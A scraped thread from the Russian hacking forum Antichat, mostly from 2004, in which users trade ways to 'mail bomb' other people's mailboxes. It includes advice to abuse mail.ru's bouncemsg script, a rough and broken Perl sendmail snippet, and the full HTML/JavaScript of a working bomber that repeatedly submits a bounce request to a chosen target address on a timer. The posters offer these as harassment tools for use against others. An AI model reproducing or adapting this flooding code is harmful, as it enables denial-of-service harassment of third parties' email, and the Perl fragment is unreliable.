Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

10.03.2004, 06:39
|
|
Познающий
Провел на форуме: 173295
|
|
Народ ..приветы всем..я понимаю ..что мыл бомбинг и мыл бомберы уже старо как мир..но все же..посоветуйте хороший мыл бомбер..а то чет ни одного толкового нет...не получается бомбить (испытывал на своем ящике)...всетаки ..пусть будет такая штука на всякий случай. 
|
|
|

29.03.2004, 01:19
|
|
Guest
Провел на форуме:
|
Советую использовать в качве шаблона html-флудер для чата, а в action указать запрос на переадресовку сообщения со своего ящика на неприятельский. 3-5 писем в секунду обеспечено, причем трафик практически не нагружается, и не зависит от размера файла, так что файлом в 200кб можно под завязку забить ящик где-то за минуту
|
|
|
|

29.03.2004, 11:40
|
|
Администратор
Провел на форуме: 4618051
|
|
Вот в чем дело: html-овский флудер для чата тут не подойдет, т.к. на многих бесплатных хостингах стоит таймаут. Там надо отсылать n-ное кол-во сообщений и заново перезагружать программу (это самый простой вариант - я уже не говорю о создании нескольких потоков с использованием прокси-сервера). Почту можно отправлять и с помощью PHP3? ASP (Active Server Pages) ... Можно написать прогу, которая сама соединится с Smtp серваком и сделает запрос на отправку письма ...
Лучше всего эту программу написать на перле, которая будет работать не с твоего компа, а с сервака. Тогда и скорость будет приличная и траффик не жрет.
Я не очень силен в перле, но код должен быть такой примерно:
#!/usr/local/bin/perl
$mailprog= '/usr/sbin/sendmail';
$mail = 'proba@mail.ru';
$from = 'antichat@mail.ru';
open (mail, "|$mailprog -t"  ;
print Mail "Countet-Type: text/plain; charset=windows-1251\n;
print Mail "Subjest: 'Привет Дарку  '\n"; <span style='color:red'>#Вот не помню как тема пишется - в апострофах или нет...</span>
print mail "to: $mail/n";
print Mail "from: $form\n\n";
print mail "Текст письма\n";
print mail "\n\n";
close (mail);
print "content-type: text/html\n\n";
print "Письмо для дарка отправлено!";
И когда ты запустишь прогу из своей бродилки, то появится сообщение, что письмо дарку отправлено, оно будет лежать в твоем ящике. Я это не компилировал, так что за работу не ручаюсь ...
С уважением, Че Гевара
|
|
|

30.03.2004, 13:04
|
|
Guest
Провел на форуме:
|
Осталось только найти бесплатный хостинг с поддержкой cgi и исходящим коннектом)
Так что думаю html-флудер использовать проще, тем более на mail.ru например в скрипте http://win.mail.ru/cgi-bin/bouncemsg не стоит ограничения по времени, более того, в поле "To", то есть кому, нет ограничений по кол-ву адресатов, по крайней мере я при тестировании бомбил сразу 6 ящиков
|
|
|
|

01.04.2004, 12:51
|
|
Администратор
Провел на форуме: 4618051
|
|
А как ты размер задавал тогда?
|
|
|

05.04.2004, 22:06
|
|
Новичок
Провел на форуме: 0
|
|
идея за хтмл флудер реальна и проста. подойдет, если по приколу самому забацать за 0.1 сек
А Че Гевара тут скрипты рисует какие то мутные: уже начал писать, так забацал бы весь скрипт уже (и цыкл, с бесконечной отправкой...) а то, не а, не то  ... кому оно нада, в таком вот виде? над бы хтмл форму намалевать, саму работу в 2х словах описать, что вообще реально, как запустить из формы(с какими параметрами), как будет сформировано обращение к скрипту? (хз, можт ты собрался с помощью джавы делать флудинг из формы...)
а сырец реально до жопы, если чел не вьедет в работу цги,
а сэндмыло все порубит и так: на хостингах все будет происходить оч долго, и юзвер добавит тебя в игнор.
(гы, привет дафи дарк!  )
мне кажется, что все можно сделать проще, с помощью скрипта cgi-mail: я заглянул только что в код, и выкупил, что он реально дыже сындмыло не юзает, вау!  вот и находка, епть. еще позволяет цеплять нехилые аттачи, внушительных размеров. это то, что нада: валишь как хошь: числом и размером, и таймауты пофигу. вот он - рулеззз.
|
|
|

06.04.2004, 08:40
|
|
Guest
Провел на форуме:
|
< script>
function bombing(){
document.forms[1].submit();
time1=setTimeout('bombing()',document.forms[2].interval.value);
}
</script>
<form name="Auth" method=post action=http://win.mail.ru/cgi-bin/auth target="right">
<input type=hidden name=SessionID value=ID_СЕССИИ_МОЖНО_НЕ_МЕНЯТЬ >
<input type=hidden name=Mpopl value=217715896>
<input type=hidden name=login_from value=titul>
<input type=hidden name="Login" value="ЛОГИН_НА_МЭЙЛ_РУ"> ;
<input type=hidden name="Domain" value="ДОМЕН">
<input type="hidden" name="Password" value="ПАРОЛЬ"></td>
<input TYPE=submit name="" value=" Войти ">
</form>
<form method="post" target="right" action=" http://win.mail.ru/cgi-bin/bouncemsg">
<input type="hidden" name="id" value="ID_ПИСЬМА_КОТОРЫМ_БОМ ИТЬ">
<input name="To">
<input type="button" name="Submit" value="ХУЙЯРИТЬ!" onClick="bombing()">
<input type="button" value="АЦТАВИТЬ!" onClick="clearTimeout(time1)">
</form>
<form>
<input name=interval value=500 size=4>
</form>
Вот html-код главного фрейма моего бомбера. Регистрируешь мыло на мэйле, отсылаешь туда файл требуемой длины, прописываешь в бомбере ID письма, логин, пароль, и весь процесс автоматизируется: нажимаешь "войти", вводишь адрес мыла которое надо бомбить, и бомбишь) Порадовало, повторяюсь, то, что трафик не жрет
|
|
|
|

23.01.2010, 00:41
|
|
Познающий
Провел на форуме: 70384
|
|
бомбилку не кто подскажет
|
|
|

23.01.2010, 00:43
|
|
Участник форума
Провел на форуме: 1768674
|
|
есть хороший бомбер от JAW )гуглите , должны найти
|
|
|

23.01.2010, 00:48
|
|
Участник форума
Провел на форуме: 3767223
|
|
археологи ппц) тема 2004 года это наверно рекорд...
|
|
|
|
 |
|
|